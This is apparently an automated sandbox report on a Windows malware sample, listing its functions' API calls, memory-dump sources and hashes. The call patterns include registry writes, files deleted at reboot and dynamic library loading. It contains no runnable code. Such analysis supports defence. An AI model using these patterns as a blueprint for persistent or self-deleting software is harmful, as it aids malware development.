                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: #$%$'$0$0$1$4$4$9$:$;$=$>$>$C$D$D$I$J$L$M$O$R$S$V$W$[$_$`$c$c$d$e$g$h$p$t$v$y$}
                                                                  • API String ID: 3677997916-3213928184
                                                                  • Opcode ID: 805f5db3b6766ee56b7c3c7fc3f70b7fb85de0509d2b3a5550262d5443ef15e8
                                                                  • Instruction ID: 3f64c0876ea013b4995e57e445dd95fb29515ce67b52a393eb856a41c12e0995
                                                                  • Opcode Fuzzy Hash: 805f5db3b6766ee56b7c3c7fc3f70b7fb85de0509d2b3a5550262d5443ef15e8
                                                                  • Instruction Fuzzy Hash: 80A1B32110D7C199D322C67C984874FFFD51BA7228F584A9DF1E44B3E3C2AA8649C76B
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004131E0
                                                                  • lstrcatA.KERNEL32(?,0042E3FC), ref: 004131F0
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F), ref: 0041320B
                                                                  • lstrlenA.KERNEL32(?), ref: 00413237
                                                                  • RegSetValueExA.ADVAPI32(?,8s2?,00000000,00000001,?,00000000), ref: 00413250
                                                                  • RegCloseKey.ADVAPI32(?,?,8s2?,00000000,00000001,?,00000000), ref: 0041325A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFileModuleNameOpenValuelstrcatlstrlen
                                                                  • String ID: #$,$0$2$3$7$8s2?$;$?$?$@$B$G$P$P$S$X$\$]$^$_$`$d$e$k$o$r$s$s$t$v$~
                                                                  • API String ID: 2804959344-2516123405
                                                                  • Opcode ID: 5fb862093511ecca7038c8434d92067763cea830cdae3e94af674eb022a143b1
                                                                  • Instruction ID: 3ee603018d8f15d3993d5d5bb64ccc4771c2b301eb19da9cd57cd54bae0688a3
                                                                  • Opcode Fuzzy Hash: 5fb862093511ecca7038c8434d92067763cea830cdae3e94af674eb022a143b1
                                                                  • Instruction Fuzzy Hash: 2091B62100D7C299D322D77C584864FFFE15BA7228F485A9DF1E45B3E3C2A98249C767
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00423155
                                                                  • DeleteFileA.KERNEL32(?), ref: 0042319C
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004231B1
                                                                  • DeleteFileA.KERNEL32(?), ref: 004231E9
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004231F7
                                                                  • DeleteFileA.KERNEL32(?), ref: 0042322F
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0042323D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$DeleteMove$DirectorySystem
                                                                  • String ID: $"$"$%s\%s$)$)$)$*$;$;$A$D$E$E$E$N$N$N$P$P$P$S$S$S$T$T$T$`$h
                                                                  • API String ID: 84336133-1389313269
                                                                  • Opcode ID: b14c0ae8dd574057b783fe73dec11bd29fa77d45c1026e4e750054b185980695
                                                                  • Instruction ID: 6d08323a6e56f1df77390437f2eab8c0537e31e2364f4842ab75f608d072a465
                                                                  • Opcode Fuzzy Hash: b14c0ae8dd574057b783fe73dec11bd29fa77d45c1026e4e750054b185980695
                                                                  • Instruction Fuzzy Hash: 44B1E96110C7C199D322DA7D9848B8FFFD51BE7218F480E9DB1E45B2D2C2A9824DC7A7
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,74DF0440), ref: 0040C634
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: $$$&$'$($)$+$.$:$;$=$@$A$D$F$I$O$O$O$[$\$`$`$a$a$c$d$g$g$k$n$p$q$u$x$z$}$~
                                                                  • API String ID: 1659193697-1776773038
                                                                  • Opcode ID: 2631a85855c076cd5aacd475e32cb0067b642e929b393d4f98d7008e1ed6a5c1
                                                                  • Instruction ID: a6680903d8d87bbf61f69c5cc6f64f2f96010d0bd9b0eb87acbe41b91fb4e4d2
                                                                  • Opcode Fuzzy Hash: 2631a85855c076cd5aacd475e32cb0067b642e929b393d4f98d7008e1ed6a5c1
                                                                  • Instruction Fuzzy Hash: 53F1C31100C7C2C9D322D63D588878FFFD11BA7228F585B9DF1E89A2E3C6A5810AC767
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00422115
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: DirectorySystem
                                                                  • String ID: $"$"$)$)$)$*$;$;$A$D$E$E$E$N$N$N$P$P$P$S$S$S$T$T$T$`$fwe$h
                                                                  • API String ID: 2188284642-27414503
                                                                  • Opcode ID: dcee0e740fe624b1217ea88155760fb8fe99a8999ef861ec3cef7feef8dc3231
                                                                  • Instruction ID: 3c27c6c0b435376128c9c62176485abffcf5cee6cb450e7dbb9848ef72dacce5
                                                                  • Opcode Fuzzy Hash: dcee0e740fe624b1217ea88155760fb8fe99a8999ef861ec3cef7feef8dc3231
                                                                  • Instruction Fuzzy Hash: 75D13A2110C7C28AD322CA3C585879BFFD11BE6318F480B9DE5E45B2D2C7A9864DC7A7
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F), ref: 00415A87
                                                                  • RegQueryValueExA.ADVAPI32(?,0042E292,00000000,00000000,?,00000013), ref: 00415AB1
                                                                  • RegCloseKey.ADVAPI32(?,?,0042E292,00000000,00000000,?,00000013), ref: 00415ABE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: $)$,$.$1$5$?$@$A$C$K$N$T$T$d$g$h$i$l$n$p$r$s$u$v$w$z
                                                                  • API String ID: 3677997916-1350007012
                                                                  • Opcode ID: fdaef75e701aef0404f417bb4a93cf4983beae994bab8cf610ec57c9fe9431a7
                                                                  • Instruction ID: bf718c844d1271869f6f5a4619d4bc1fbd5c2e1576c271db0d89f6da38526253
                                                                  • Opcode Fuzzy Hash: fdaef75e701aef0404f417bb4a93cf4983beae994bab8cf610ec57c9fe9431a7
                                                                  • Instruction Fuzzy Hash: 0871B72050C7C1DDD322C67C984874FBFD11BA7328F484B8DF1E45A2E6D2AA8649C76B
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004123BE
                                                                    • Part of subcall function 0041DF40: CreateFileA.KERNEL32(00000000,00000001,00000001,00000000,00000003,00000000,00000000,74DF2EE0,00000001,00000000,004123D8,?,?,?), ref: 0041DF78
                                                                    • Part of subcall function 0041DF40: GetFileSize.KERNEL32(00000000,00000000), ref: 0041DF88
                                                                    • Part of subcall function 0041DF40: CloseHandle.KERNEL32(00000000), ref: 0041DF95
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 004123EE
                                                                  • HeapFree.KERNEL32(00000000), ref: 004123F5
                                                                  • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000), ref: 00412439
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041243C
                                                                  • GetProcessHeap.KERNEL32(00000000,?,74DF2EE0,00000001), ref: 0041247E
                                                                  • HeapFree.KERNEL32(00000000), ref: 00412487
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004124AC
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004124AF
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004124C4
                                                                  • HeapFree.KERNEL32(00000000), ref: 004124C7
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004124FD
                                                                  • HeapFree.KERNEL32(00000000), ref: 00412500
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041250E
                                                                  • HeapFree.KERNEL32(00000000), ref: 00412511
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free$File$Alloc$CloseCreateHandleModuleNameSize
                                                                  • String ID:
                                                                  • API String ID: 1079676353-0
                                                                  • Opcode ID: 4e0c200c8c15de1c34501c1501da476887ff163203a424eaa44262bbe6b8bc17
                                                                  • Instruction ID: 17315ba9b804ea5b43f0dc8ea45a8c146efaa34e73fe8ad2d9cbea40495e9014
                                                                  • Opcode Fuzzy Hash: 4e0c200c8c15de1c34501c1501da476887ff163203a424eaa44262bbe6b8bc17
                                                                  • Instruction Fuzzy Hash: 6561A5B57043446BE724EBB5EC56FFB739CEB88714F40082AF549C3291DA79EC108666
                                                                  APIs
                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,00001388), ref: 0041C2CB
                                                                  • WaitForSingleObject.KERNEL32(?,00002710,?,?,?,?,?,?,?,?,?,00001388), ref: 0041C2E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSingleSleepWait
                                                                  • String ID: '$.$0$2$4$:$:$C$I$M$U$V$Y$d$l$z${
                                                                  • API String ID: 309074506-2986699499
                                                                  • Opcode ID: eb96c70319cd0b3451e5825f8352d491de8bb6029cd1e33e93e4916a575053ba
                                                                  • Instruction ID: fcf21cc62856f80bb5c310aab61f0a24f3f1c6b30d2e4690c96e373a58e0fda4
                                                                  • Opcode Fuzzy Hash: eb96c70319cd0b3451e5825f8352d491de8bb6029cd1e33e93e4916a575053ba
                                                                  • Instruction Fuzzy Hash: 3CB18C3150C3C1CAD321CB39988478BFFE46BA6714F484A5EF5E5972D2C2798149CB6B
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000000), ref: 00412C26
                                                                  • GetLocalTime.KERNEL32(0000003C), ref: 00412C31
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00412C4B
                                                                  • WriteFile.KERNEL32(00000000,000000E6,00000010,0000003C,00000000), ref: 00412C62
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412C69
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateEnvironmentExpandHandleLocalStringsTimeWrite
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
                                                                  • API String ID: 2838349079-1073058172
                                                                  • Opcode ID: 37388e250c0d3da558317f92ab88a6508f4e7bf2038ca778009507825cbacb26
                                                                  • Instruction ID: 9d5602a8bff07f8f1bd6dde567594dbbd8fa68865cf92d56b2b83de2356b4480
                                                                  • Opcode Fuzzy Hash: 37388e250c0d3da558317f92ab88a6508f4e7bf2038ca778009507825cbacb26
                                                                  • Instruction Fuzzy Hash: 4C41112010C3C199D322D7389848B8FBFD15BA7218F488B9DF1E45A2D2C2759249C7AB
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000001), ref: 004121E0
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 004121FF
                                                                  • LoadLibraryA.KERNEL32(?,00000000), ref: 00412252
                                                                  • GetProcAddress.KERNEL32(00000000,0042E3F0), ref: 004122AC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressAttributesEnvironmentExpandFileLibraryLoadProcStrings
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
                                                                  • API String ID: 925820237-1073058172
                                                                  • Opcode ID: 131d082f9de17865684a3e021f0ddc608ce7fca9326b0bc6ab7601fe30902281
                                                                  • Instruction ID: 95e2059b24e6b08625558fafe1d9927b9274d35295d34d11aa50597a438a658b
                                                                  • Opcode Fuzzy Hash: 131d082f9de17865684a3e021f0ddc608ce7fca9326b0bc6ab7601fe30902281
                                                                  • Instruction Fuzzy Hash: C651631010C3D19AD311DB39989579BBFD45BA7328F485A9DF4E8472D3C269820DC76B
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000000), ref: 00412AB6
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00412AD0
                                                                  • ReadFile.KERNEL32(00000000,000000E6,00000010,?,00000000), ref: 00412B02
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412B09
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateEnvironmentExpandHandleReadStrings
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z${
                                                                  • API String ID: 2873326616-1073058172
                                                                  • Opcode ID: 71fe3081bd5b8bd7161fbc035ce1e9a9d4373e19c6f6c250aca107c39a209abf
                                                                  • Instruction ID: 8c6ea43fa09a3286770b603215ecff93b091f737eb22e7810364243bb09da271
                                                                  • Opcode Fuzzy Hash: 71fe3081bd5b8bd7161fbc035ce1e9a9d4373e19c6f6c250aca107c39a209abf
                                                                  • Instruction Fuzzy Hash: 4E41032010C3C199D322D73C984878FBFD55BA7318F488B9DF1E85A2D2D3A99649C76B
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000000), ref: 0040B70E
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B728
                                                                  • ReadFile.KERNEL32(00000000,004310B8,00000004,?,00000000), ref: 0040B744
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B760
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
